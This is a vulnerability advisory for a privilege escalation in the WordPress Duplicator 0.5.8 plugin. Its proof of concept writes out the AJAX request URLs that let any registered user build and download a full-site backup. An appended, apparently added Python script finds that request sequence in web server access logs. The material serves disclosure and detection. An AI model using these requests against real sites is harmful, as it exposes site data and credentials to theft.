WordPress Duplicator 0.5.8 Privilege Escalation

2015.02.19
Credit: Kacper Szurek
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps

1. Description

Every registered user can create and download backup files. The plugin registers its package handlers as wp_ajax_ actions, which WordPress runs for any logged-in user.

File: duplicator\duplicator.php

add_action('wp_ajax_duplicator_package_scan', 'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build', 'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete', 'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report', 'duplicator_package_report');

http://security.szurek.pl/duplicator-058-privilege-escalation.html

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register), then start a scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that you can build a backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function returns JSON with the backup name in the File key.

You can download the backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

3. Solution:

Update to version 0.5.10

References:

http://security.szurek.pl/
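
For sites that ran an affected version, the request sequence in the proof of concept can be looked for in web server access logs. The following is an added example, not part of the original advisory or the plugin: it assumes combined-format logs and GET requests with the action in the query string, as in the proof of concept, and the log lines, IP addresses and archive name are constructed. Access logs do not show the caller's WordPress role, so hits still need to be correlated with known administrator activity.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_package_scan HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Nov/2014:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_package_build HTTP/1.1" 200 230 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Nov/2014:10:00:15 +0000] "GET /wp-snapshots/example_archive.zip HTTP/1.1" 200 48211334 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Nov/2014:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Nov/2014:10:03:00 +0000] "GET /wp-snapshots/example_archive.zip HTTP/1.1" 403 199 "-" "curl/7.38"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ACTIONS = {"duplicator_package_scan", "duplicator_package_build",
           "duplicator_package_delete", "duplicator_package_report"}

def classify(path_and_query):
    """Return the Duplicator-related event kind for a request target, or None."""
    url = urlsplit(path_and_query)
    if url.path.endswith("/wp-admin/admin-ajax.php"):
        action = parse_qs(url.query).get("action", [""])[0]
        return action if action in ACTIONS else None
    if "/wp-snapshots/" in url.path:
        return "snapshot_download"
    return None

def find_suspects(log_text):
    """Map client IP -> ordered list of Duplicator events that got a 2xx status."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, _method, target, status = m.groups()
        kind = classify(target)
        if kind and status.startswith("2"):
            events[ip].append(kind)
    return dict(events)

def built_then_downloaded(events):
    """Client IPs that built a package and later fetched a file from /wp-snapshots/."""
    hits = []
    for ip, kinds in events.items():
        if "duplicator_package_build" in kinds:
            i = kinds.index("duplicator_package_build")
            if "snapshot_download" in kinds[i + 1:]:
                hits.append(ip)
    return sorted(hits)
```

Run `built_then_downloaded(find_suspects(text))` over the real log contents; requests sent as POST carry the action in the body and will not appear in a standard access log.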

